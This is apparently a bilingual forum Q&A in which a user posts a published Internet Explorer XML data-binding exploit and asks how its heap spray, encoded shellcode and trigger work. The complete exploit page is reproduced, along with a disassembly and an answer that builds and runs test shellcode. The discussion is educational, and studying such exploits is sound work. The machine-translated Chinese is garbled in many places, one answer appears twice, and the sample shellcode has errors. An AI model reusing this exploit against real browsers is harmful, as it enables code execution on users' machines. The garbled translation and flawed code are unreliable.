I usually do not have difficulty to read JavaScript script but this one I can't figure out the logic. The code is from an Exploit that has been published 4 days ago. You can find it at milw0rm.
我通常读JavaScript脚本不会有困难,但是这个我搞不懂逻辑。该代码来自4天前发布的一个漏洞。你可以在milw0rm找到它。
Here is the code:
这是代码:
<html>
<div id="replace">x</div>
<script>
// windows/exec - 148 bytes
// http://www.metasploit.com
// Encoder: x86/shikata_ga_nai
// EXITFUNC=process, CMD=calc.exe
var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");
// ugly heap spray, the d0nkey way!
// works most of the time
var spray = unescape("%u0a0a%u0a0a");
do {
spray += spray;
} while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++)
memory[i] = spray + shellcode;
xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://ਊਊ.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
tag = document.getElementById("replace");
tag.innerHTML = xmlcode;
</script>
</html>
Here is what I believe it does and I would like you to help me for the part that I misunderstand.
这就是我所相信的,我希望你能帮助我理解我所误解的部分。
The variable shellcode contain the code to open the calc.exe. I do not get it how they have found that weird string... any idea?
变量shell代码包含打开calc.exe的代码。我不明白他们是怎么找到那根奇怪的绳子的……任何想法?
The second thing is the variable spray. I do not understand this weird loop?
第二件事是可变喷雾。我不明白这个奇怪的循环?
The third thing is the variable memory that is never used anywhere, why do they create it?
第三件事是变量内存从来没有在任何地方使用,为什么他们要创建它?
Last thing, What does the XML tag do in the page?
最后,XML标记在页面中做什么?
Update
Alright, for the moment I have good answers but mostly very general. I would like more explanations of the value of the code. An example is unescape("%u0a0a%u0a0a");. What does it mean? Same thing for the loop, why did the developer write: length < 0xd0000? I would like a deeper understanding, not only the theory of this code.
好吧,目前我有很好的答案,但大部分都很一般。我希望更多地解释代码的价值。一个例子就是unescape(" % u0a0a % u0a0a ");。这是什么意思?循环也是如此,为什么开发人员要写:length < 0xd0000?我想要一个更深入的理解,不仅仅是这个代码的理论。
9 个解决方案
#1
310
The shellcode contains some x86 assembly instructions that will do the actual exploit. spray creates a long sequence of instructions that will be put in memory. Since we can't usually find out the exact location of our shellcode in memory, we put a lot of nop instructions before it and jump to somewhere there. The memory array will hold the actual x86 code along with the jumping mechanism. We'll feed the crafted XML to the library which has a bug. When it's being parsed, the bug will cause the instruction pointer register to be assigned to somewhere in our exploit, leading to arbitrary code execution.
shellcode包含一些x86汇编指令,这些指令将执行实际的开发。spray生成了一长串指令,并将其保存到内存中。由于我们通常无法在内存中找到shellcode的确切位置,所以我们在它之前添加了很多nop指令,然后跳转到某个地方。内存数组将包含实际的x86代码以及跳转机制。我们将把精心制作的XML提供给有错误的库。当它被解析时,这个错误将导致将指令指针寄存器分配到我们开发的某个地方,从而导致任意的代码执行。
To understand more deeply, you should actually figure out what is in the x86 code. unscape will be used to put the sequence of bytes represented of the string in the spray variable. It's valid x86 code that fills a large chunk of the heap and jumps to the start of shellcode. The reason for the ending condition is string length limitations of the scripting engine. You can't have strings larger than a specific length.
为了更深入地理解,您应该实际了解x86代码中的内容。unscape将用于将字符串的序列表示为spray变量中的字符串。它是有效的x86代码,它填充了大量的堆,并跳转到shell代码的开头。终止条件的原因是脚本引擎的字符串长度限制。字符串不能大于特定长度。
In x86 assembly, 0a0a represents or cl, [edx]. This is effectively equivalent to nop instruction for the purposes of our exploit. Wherever we jump to in the spray, we'll get to the next instruction until we reach the shellcode which is the code we actually want to execute.
在x86程序集中,0a0a表示或cl, [edx]。这实际上相当于nop指令,目的是为了我们的开发。无论我们跳到何处,我们都将到达下一个指令,直到我们到达shell代码,也就是我们真正想要执行的代码。
If you look at the XML, you'll see 0x0a0a is there too. Exactly describing what happens requires specific knowledge of the exploit (you have to know where the bug is and how it's exploited, which I don't know). However, it seems that we force Internet Explorer to trigger the buggy code by setting the innerHtml to that malicious XML string. Internet Explorer tries to parse it and the buggy code somehow gives control to a location of memory where the array exists (since it's a large chunk, the probability of jumping there is high). When we jump there the CPU will keep executing or cl, [edx] instructions until in reaches the beginning of shellcode that's put in memory.
如果您查看XML,您将看到0x0a0a也在那里。准确地描述所发生的事情需要对漏洞有具体的了解(您必须知道漏洞在哪里以及如何被利用,我不知道)。然而,我们似乎迫使Internet Explorer通过将innerHtml设置为那个恶意的XML字符串来触发bug代码。Internet Explorer试图解析它,而bug代码以某种方式为数组存在的内存位置提供了控制(因为它是一个大块,所以跳转到那里的概率很高)。当我们跳转到那里时,CPU将继续执行cl或[edx]指令,直到到达装入内存的shellcode的开头。
I've disassembled the shellcode:
我拆卸shellcode。
00000000 C9 leave
00000001 2B1F sub ebx,[edi]
00000003 B10C mov cl,0xc
00000005 BDC536DB9B mov ebp,0x9bdb36c5
0000000A D9C5 fld st5
0000000C 2474 and al,0x74
0000000E 5A pop edx
0000000F F4 hlt
00000010 EA8331FC0B6A6A jmp 0x6a6a:0xbfc3183
00000017 03D4 add edx,esp
00000019 07 pop es
0000001A 67305CFF xor [si-0x1],bl
0000001E 98 cwde
0000001F BBD7FFA4FE mov ebx,0xfea4ffd7
00000024 9B wait
00000025 74AD jz 0xffffffd4
00000027 058B8B028D add eax,0x8d028b8b
0000002C D893BCCD35A2 fcom dword [ebx+0xa235cdbc]
00000032 37 aaa
00000033 B84290A63A mov eax,0x3aa69042
00000038 94 xchg eax,esp
00000039 E99AA4D58D jmp 0x8dd5a4d8
0000003E E5A3 in eax,0xa3
00000040 1F pop ds
00000041 4C dec esp
00000042 EB46 jmp short 0x8a
00000044 4B dec ebx
00000045 8CD0 mov eax,ss
00000047 AD lodsd
00000048 A844 test al,0x44
0000004A 52 push edx
0000004B 4A dec edx
0000004C 3B81B80DD748 cmp eax,[ecx+0x48d70db8]
00000052 4B dec ebx
00000053 D46C aam 0x6c
00000055 46 inc esi
00000056 1392734A204F adc edx,[edx+0x4f204a73]
0000005C F8 clc
0000005D 6E outsb
0000005E DC8EA20726B4 fmul qword [esi+0xb42607a2]
00000064 04D4 add al,0xd4
00000066 D084ECBA978221 rol byte [esp+ebp*8+0x218297ba],1
0000006D 7CE8 jl 0x57
0000006F C0CA8C ror dl,0x8c
00000072 F4 hlt
00000073 A6 cmpsb
00000074 47 inc edi
00000075 210D2EA0B0CD and [0xcdb0a02e],ecx
0000007B 2CA8 sub al,0xa8
0000007D B05B mov al,0x5b
0000007F 43 inc ebx
00000080 F4 hlt
00000081 24E8 and al,0xe8
00000083 7A9C jpe 0x21
00000085 BB857DCBA0 mov ebx,0xa0cb7d85
0000008A 7DED jnl 0x79
0000008C 92 xchg eax,edx
0000008D 09E1 or ecx,esp
0000008F 96 xchg eax,esi
00000090 315580 xor [ebp-0x80],edx
Understanding this shellcode requires x86 assembly knowledge and the problem in the MS library itself (to know what the system state is when we reach here), not JavaScript! This code will in turn execute calc.exe.
理解这个shellcode需要x86汇编知识和MS库本身的问题(以便在到达这里时知道系统状态),而不是JavaScript!这段代码将依次执行calc.exe。
#2
13
You should look into Heap Spraying:
您应该研究堆喷洒:
http://en.wikipedia.org/wiki/Heap_spraying
http://en.wikipedia.org/wiki/Heap_spraying
#3
10
This looks like an exploit of the recent Internet Explorer bug that Microsoft released the emergency patch for. It uses a flaw in the databinding feature of Microsoft's XML handler, that causes heap memory to be deallocated incorrectly.
这看起来像是微软最近发布的紧急补丁的漏洞。它在微软的XML处理程序的数据绑定特性中使用了一个缺陷,导致堆内存被错误地分配。
Shellcode is machine code that will run when the bug occurs. Spray and memory are just some space allocated on the heap to help the exploitable condition occur.
Shellcode是当出现错误时运行的机器代码。喷雾和内存只是堆上分配的一些空间,用于帮助发生可利用的情况。
#4
3
Heap Spraying is common way to exploit browser stuff, if you are into it you can find several posts like this : http://sf-freedom.blogspot.com/2006/06/heap-spraying-introduction.html
堆喷洒是利用浏览器的常用方法,如果您对它感兴趣,您可以找到以下几个帖子:http://sf-freedom.blogspot.com/2006/06/heap- spraying-tion.html
#5
2
Any time I see memory that doesn't get addressed in an exploit discussion, my first thought is that the exploit is some sort of buffer overflow, in which case the memory is either causing the buffer to overflow or is being accessed once the buffer overflows.
每当我看到未在利用讨论中处理的内存时,我的第一个想法是,利用是某种缓冲区溢出,在这种情况下,内存要么导致缓冲区溢出,要么在缓冲区溢出时被访问。
#6
0
This is from metasploit, that means it's using one of metasploit shell codes. It's open source so you can go and grab it : http://www.metasploit.com/
这是来自metasploit,这意味着它正在使用一个metasploit外壳代码。它是开源的,所以您可以去获取它:http://www.metasploit.com/
#7
0
For more background on the vulnerability itself, I'd suggest reading MS08-078 and the SDL.
关于漏洞本身的更多背景信息,我建议您阅读MS08-078和SDL。
#8
0
See Character encodings in HTML.
参见HTML中的字符编码。
It's binary data encoded as a string, which JavaScript is decoding.
它是用字符串编码的二进制数据,JavaScript正在对其进行解码。
Common form of XSS also.
XSS的常见形式。
You can see all the encoding tricks here:
你可以在这里看到所有的编码技巧:
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
http://www.owasp.org/index.php/Category OWASP_CAL9000_Project
#9
0
Simple shellcode example
简单的shellcode示例
hello world in assembly at&t syntax x86 i believe(Wizzard in Training).
我相信装配at&t语法x86的hello world (Wizzard在培训中)。
set up the file:vim shellcodeExample.s
设置文件:vim shellcodeExample.s
.text #required
.goblal _start #required
_start: #main function
jmp one #jump to the section labeled one:
two:
pop %rcx #pop %rcx off the stack, or something
xor %rax, %rax #Clear
movl 4, %rax #use sys_write(printf || std::cout)
xor %rbx, %rbx #Clear
inc %rbx #increment %rbx to 1 stdout(terminal)
xor %rdx, %rdx #Clear Registers or something
movb $13, %dl #String Size
int $0x80
one:
call two #jump up to section two:
.ascii "Hello World\r\n" #make the string one of the starting memory
#^-addresses
compile like so:as -o shellcodeExample.o shellcodeExample.s ; ld -s -o shellcode shellcodeExample.o
编译方式如下:as -o shellcodeExample。o shellcodeExample。年代;ld -s -o shellcode shellcodeExample.o
Now you have a binary that prints out hello world. to convert the binary into shell code type in: objdump -D shellcode
现在有一个二进制文件打印出hello world。要将二进制文件转换为shell代码类型,请输入:objdump -D shell代码
you will get the output:
输出如下:
shellcode: file format elf64-x86-64
Disassembly of section .text:
0000000000400078 <.text>:
400078: eb 1a jmp 0x400094
40007a: 59 pop %rcx
40007b: 48 31 c0 xor %rax,%rax
40007e: b0 04 mov $0x4,%al
400080: 48 31 db xor %rbx,%rbx
400083: 48 ff c3 inc %rbx
400086: 48 31 d2 xor %rdx,%rdx
400089: b2 0d mov $0xd,%dl
40008b: cd 80 int $0x80
40008d: b0 01 mov $0x1,%al
40008f: 48 ff cb dec %rbx
400092: cd 80 int $0x80
400094: e8 e1 ff ff ff callq 0x40007a
400099: 68 65 6c 6c 6f pushq $0x6f6c6c65
40009e: 20 77 6f and %dh,0x6f(%rdi)
4000a1: 72 6c jb 0x40010f
4000a3: 64 fs
4000a4: 0d .byte 0xd
4000a5: 0a .byte 0xa
Now if you look on the 4th line with text you will see: 400078: eb 1a jmp 0x400094
现在,如果您使用文本查看第4行,您将看到:400078:eb 1a jmp 0x400094
the part that says eb 1a is the hexadecimal representation of the assembly instruction jmp one where "one" is the memory address of your string.
表示eb 1a的部分是汇编指令jmp 1的十六进制表示,其中“1”是字符串的内存地址。
to prep your shellcode for execution open up another text file and store the hex values in a character array. To format the shell code correctly you type in a \x before every hex value.
要为执行准备shell代码,请打开另一个文本文件,并将十六进制值存储在字符数组中。要正确格式化shell代码,请在每个十六进制值之前输入一个\x。
the upcoming shell code example will look like the following according to the objdump command output:
根据objdump命令输出,即将出现的shell代码示例将如下所示:
unsigned char PAYLOAD[] =
"\xeb\x1a\x59\x48\x31\xc0\xb0\x04\x48\x31\xdb\x48\xff\xc3\x48\x31\xd2\xb2\xd0\xcd\x80\xb0\x01\x48\xff\xcb\xcd\x80\xe8\xe1\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0d\x0a";
This example uses C for the array. Now you have working shellcode that will write to stdout "hello world"
这个例子使用C表示数组。现在,您有了可工作的shell代码,该代码将写入stdout“hello world”
you can test the shell code by placing it in a vulnerability or you can write the following c program to test it:
您可以将shell代码放在漏洞中进行测试,也可以编写以下c程序进行测试:
vim execShellcode.cc; //linux command to create c file.
/*Below is the content of execShellcode.cc*/
unsigned char PAYLOAD[] =
"\xeb\x1a\x59\x48\x31\xc0\xb0\x04\x48\x31\xdb\x48\xff\xc3\x48\x31\xd2\xb2\xd0\xcd\x80\xb0\x01\x48\xff\xcb\xcd\x80\xe8\xe1\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0d\x0a";
int main(){
((void(*)(void))PAYLOAD)();
return 0;
}
To compile the program type in:
编写程序类型:
gcc -fno-stack-protector -z execstack execShellcode.cc -o run
run with ./run You know have a working example of simple shellcode development that was tested in linux mint/debian.
运行。/运行您知道有一个简单的shell代码开发的例子,在linux mint/debian中测试过。
#1
310
The shellcode contains some x86 assembly instructions that will do the actual exploit. spray creates a long sequence of instructions that will be put in memory. Since we can't usually find out the exact location of our shellcode in memory, we put a lot of nop instructions before it and jump to somewhere there. The memory array will hold the actual x86 code along with the jumping mechanism. We'll feed the crafted XML to the library which has a bug. When it's being parsed, the bug will cause the instruction pointer register to be assigned to somewhere in our exploit, leading to arbitrary code execution.
shellcode包含一些x86汇编指令,这些指令将执行实际的开发。spray生成了一长串指令,并将其保存到内存中。由于我们通常无法在内存中找到shellcode的确切位置,所以我们在它之前添加了很多nop指令,然后跳转到某个地方。内存数组将包含实际的x86代码以及跳转机制。我们将把精心制作的XML提供给有错误的库。当它被解析时,这个错误将导致将指令指针寄存器分配到我们开发的某个地方,从而导致任意的代码执行。
To understand more deeply, you should actually figure out what is in the x86 code. unscape will be used to put the sequence of bytes represented of the string in the spray variable. It's valid x86 code that fills a large chunk of the heap and jumps to the start of shellcode. The reason for the ending condition is string length limitations of the scripting engine. You can't have strings larger than a specific length.
为了更深入地理解,您应该实际了解x86代码中的内容。unscape将用于将字符串的序列表示为spray变量中的字符串。它是有效的x86代码,它填充了大量的堆,并跳转到shell代码的开头。终止条件的原因是脚本引擎的字符串长度限制。字符串不能大于特定长度。
In x86 assembly, 0a0a represents or cl, [edx]. This is effectively equivalent to nop instruction for the purposes of our exploit. Wherever we jump to in the spray, we'll get to the next instruction until we reach the shellcode which is the code we actually want to execute.
在x86程序集中,0a0a表示或cl, [edx]。这实际上相当于nop指令,目的是为了我们的开发。无论我们跳到何处,我们都将到达下一个指令,直到我们到达shell代码,也就是我们真正想要执行的代码。
If you look at the XML, you'll see 0x0a0a is there too. Exactly describing what happens requires specific knowledge of the exploit (you have to know where the bug is and how it's exploited, which I don't know). However, it seems that we force Internet Explorer to trigger the buggy code by setting the innerHtml to that malicious XML string. Internet Explorer tries to parse it and the buggy code somehow gives control to a location of memory where the array exists (since it's a large chunk, the probability of jumping there is high). When we jump there the CPU will keep executing or cl, [edx] instructions until in reaches the beginning of shellcode that's put in memory.
如果您查看XML,您将看到0x0a0a也在那里。准确地描述所发生的事情需要对漏洞有具体的了解(您必须知道漏洞在哪里以及如何被利用,我不知道)。然而,我们似乎迫使Internet Explorer通过将innerHtml设置为那个恶意的XML字符串来触发bug代码。Internet Explorer试图解析它,而bug代码以某种方式为数组存在的内存位置提供了控制(因为它是一个大块,所以跳转到那里的概率很高)。当我们跳转到那里时,CPU将继续执行cl或[edx]指令,直到到达装入内存的shellcode的开头。
I've disassembled the shellcode:
我拆卸shellcode。
00000000 C9 leave
00000001 2B1F sub ebx,[edi]
00000003 B10C mov cl,0xc
00000005 BDC536DB9B mov ebp,0x9bdb36c5
0000000A D9C5 fld st5
0000000C 2474 and al,0x74
0000000E 5A pop edx
0000000F F4 hlt
00000010 EA8331FC0B6A6A jmp 0x6a6a:0xbfc3183
00000017 03D4 add edx,esp
00000019 07 pop es
0000001A 67305CFF xor [si-0x1],bl
0000001E 98 cwde
0000001F BBD7FFA4FE mov ebx,0xfea4ffd7
00000024 9B wait
00000025 74AD jz 0xffffffd4
00000027 058B8B028D add eax,0x8d028b8b
0000002C D893BCCD35A2 fcom dword [ebx+0xa235cdbc]
00000032 37 aaa
00000033 B84290A63A mov eax,0x3aa69042
00000038 94 xchg eax,esp
00000039 E99AA4D58D jmp 0x8dd5a4d8
0000003E E5A3 in eax,0xa3
00000040 1F pop ds
00000041 4C dec esp
00000042 EB46 jmp short 0x8a
00000044 4B dec ebx
00000045 8CD0 mov eax,ss
00000047 AD lodsd
00000048 A844 test al,0x44
0000004A 52 push edx
0000004B 4A dec edx
0000004C 3B81B80DD748 cmp eax,[ecx+0x48d70db8]
00000052 4B dec ebx
00000053 D46C aam 0x6c
00000055 46 inc esi
00000056 1392734A204F adc edx,[edx+0x4f204a73]
0000005C F8 clc
0000005D 6E outsb
0000005E DC8EA20726B4 fmul qword [esi+0xb42607a2]
00000064 04D4 add al,0xd4
00000066 D084ECBA978221 rol byte [esp+ebp*8+0x218297ba],1
0000006D 7CE8 jl 0x57
0000006F C0CA8C ror dl,0x8c
00000072 F4 hlt
00000073 A6 cmpsb
00000074 47 inc edi
00000075 210D2EA0B0CD and [0xcdb0a02e],ecx
0000007B 2CA8 sub al,0xa8
0000007D B05B mov al,0x5b
0000007F 43 inc ebx
00000080 F4 hlt
00000081 24E8 and al,0xe8
00000083 7A9C jpe 0x21
00000085 BB857DCBA0 mov ebx,0xa0cb7d85
0000008A 7DED jnl 0x79
0000008C 92 xchg eax,edx
0000008D 09E1 or ecx,esp
0000008F 96 xchg eax,esi
00000090 315580 xor [ebp-0x80],edx
Understanding this shellcode requires x86 assembly knowledge and the problem in the MS library itself (to know what the system state is when we reach here), not JavaScript! This code will in turn execute calc.exe.
理解这个shellcode需要x86汇编知识和MS库本身的问题(以便在到达这里时知道系统状态),而不是JavaScript!这段代码将依次执行calc.exe。
#2
13
You should look into Heap Spraying:
您应该研究堆喷洒:
http://en.wikipedia.org/wiki/Heap_spraying
http://en.wikipedia.org/wiki/Heap_spraying
#3
10
This looks like an exploit of the recent Internet Explorer bug that Microsoft released the emergency patch for. It uses a flaw in the databinding feature of Microsoft's XML handler, that causes heap memory to be deallocated incorrectly.
这看起来像是微软最近发布的紧急补丁的漏洞。它在微软的XML处理程序的数据绑定特性中使用了一个缺陷,导致堆内存被错误地分配。
Shellcode is machine code that will run when the bug occurs. Spray and memory are just some space allocated on the heap to help the exploitable condition occur.
Shellcode是当出现错误时运行的机器代码。喷雾和内存只是堆上分配的一些空间,用于帮助发生可利用的情况。
#4
3
Heap Spraying is common way to exploit browser stuff, if you are into it you can find several posts like this : http://sf-freedom.blogspot.com/2006/06/heap-spraying-introduction.html
堆喷洒是利用浏览器的常用方法,如果您对它感兴趣,您可以找到以下几个帖子:http://sf-freedom.blogspot.com/2006/06/heap- spraying-tion.html
#5
2
Any time I see memory that doesn't get addressed in an exploit discussion, my first thought is that the exploit is some sort of buffer overflow, in which case the memory is either causing the buffer to overflow or is being accessed once the buffer overflows.
每当我看到未在利用讨论中处理的内存时,我的第一个想法是,利用是某种缓冲区溢出,在这种情况下,内存要么导致缓冲区溢出,要么在缓冲区溢出时被访问。
#6
0
This is from metasploit, that means it's using one of metasploit shell codes. It's open source so you can go and grab it : http://www.metasploit.com/
这是来自metasploit,这意味着它正在使用一个metasploit外壳代码。它是开源的,所以您可以去获取它:http://www.metasploit.com/
#7
0
For more background on the vulnerability itself, I'd suggest reading MS08-078 and the SDL.
关于漏洞本身的更多背景信息,我建议您阅读MS08-078和SDL。
#8
0
See Character encodings in HTML.
参见HTML中的字符编码。
It's binary data encoded as a string, which JavaScript is decoding.
它是用字符串编码的二进制数据,JavaScript正在对其进行解码。
Common form of XSS also.
XSS的常见形式。
You can see all the encoding tricks here:
你可以在这里看到所有的编码技巧:
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
http://www.owasp.org/index.php/Category OWASP_CAL9000_Project
#9
0
Simple shellcode example
简单的shellcode示例
hello world in assembly at&t syntax x86 i believe(Wizzard in Training).
我相信装配at&t语法x86的hello world (Wizzard在培训中)。
set up the file:vim shellcodeExample.s
设置文件:vim shellcodeExample.s
.text #required
.goblal _start #required
_start: #main function
jmp one #jump to the section labeled one:
two:
pop %rcx #pop %rcx off the stack, or something
xor %rax, %rax #Clear
movl 4, %rax #use sys_write(printf || std::cout)
xor %rbx, %rbx #Clear
inc %rbx #increment %rbx to 1 stdout(terminal)
xor %rdx, %rdx #Clear Registers or something
movb $13, %dl #String Size
int $0x80
one:
call two #jump up to section two:
.ascii "Hello World\r\n" #make the string one of the starting memory
#^-addresses
compile like so:as -o shellcodeExample.o shellcodeExample.s ; ld -s -o shellcode shellcodeExample.o
编译方式如下:as -o shellcodeExample。o shellcodeExample。年代;ld -s -o shellcode shellcodeExample.o
Now you have a binary that prints out hello world. to convert the binary into shell code type in: objdump -D shellcode
现在有一个二进制文件打印出hello world。要将二进制文件转换为shell代码类型,请输入:objdump -D shell代码
you will get the output:
输出如下:
shellcode: file format elf64-x86-64
Disassembly of section .text:
0000000000400078 <.text>:
400078: eb 1a jmp 0x400094
40007a: 59 pop %rcx
40007b: 48 31 c0 xor %rax,%rax
40007e: b0 04 mov $0x4,%al
400080: 48 31 db xor %rbx,%rbx
400083: 48 ff c3 inc %rbx
400086: 48 31 d2 xor %rdx,%rdx
400089: b2 0d mov $0xd,%dl
40008b: cd 80 int $0x80
40008d: b0 01 mov $0x1,%al
40008f: 48 ff cb dec %rbx
400092: cd 80 int $0x80
400094: e8 e1 ff ff ff callq 0x40007a
400099: 68 65 6c 6c 6f pushq $0x6f6c6c65
40009e: 20 77 6f and %dh,0x6f(%rdi)
4000a1: 72 6c jb 0x40010f
4000a3: 64 fs
4000a4: 0d .byte 0xd
4000a5: 0a .byte 0xa
Now if you look on the 4th line with text you will see: 400078: eb 1a jmp 0x400094
现在,如果您使用文本查看第4行,您将看到:400078:eb 1a jmp 0x400094
the part that says eb 1a is the hexadecimal representation of the assembly instruction jmp one where "one" is the memory address of your string.
表示eb 1a的部分是汇编指令jmp 1的十六进制表示,其中“1”是字符串的内存地址。
to prep your shellcode for execution open up another text file and store the hex values in a character array. To format the shell code correctly you type in a \x before every hex value.
要为执行准备shell代码,请打开另一个文本文件,并将十六进制值存储在字符数组中。要正确格式化shell代码,请在每个十六进制值之前输入一个\x。
the upcoming shell code example will look like the following according to the objdump command output:
根据objdump命令输出,即将出现的shell代码示例将如下所示:
unsigned char PAYLOAD[] =
"\xeb\x1a\x59\x48\x31\xc0\xb0\x04\x48\x31\xdb\x48\xff\xc3\x48\x31\xd2\xb2\xd0\xcd\x80\xb0\x01\x48\xff\xcb\xcd\x80\xe8\xe1\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0d\x0a";
This example uses C for the array. Now you have working shellcode that will write to stdout "hello world"
这个例子使用C表示数组。现在,您有了可工作的shell代码,该代码将写入stdout“hello world”
you can test the shell code by placing it in a vulnerability or you can write the following c program to test it:
您可以将shell代码放在漏洞中进行测试,也可以编写以下c程序进行测试:
vim execShellcode.cc; //linux command to create c file.
/*Below is the content of execShellcode.cc*/
unsigned char PAYLOAD[] =
"\xeb\x1a\x59\x48\x31\xc0\xb0\x04\x48\x31\xdb\x48\xff\xc3\x48\x31\xd2\xb2\xd0\xcd\x80\xb0\x01\x48\xff\xcb\xcd\x80\xe8\xe1\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0d\x0a";
int main(){
((void(*)(void))PAYLOAD)();
return 0;
}
To compile the program type in:
编写程序类型:
gcc -fno-stack-protector -z execstack execShellcode.cc -o run
run with ./run You know have a working example of simple shellcode development that was tested in linux mint/debian.
运行。/运行您知道有一个简单的shell代码开发的例子,在linux mint/debian中测试过。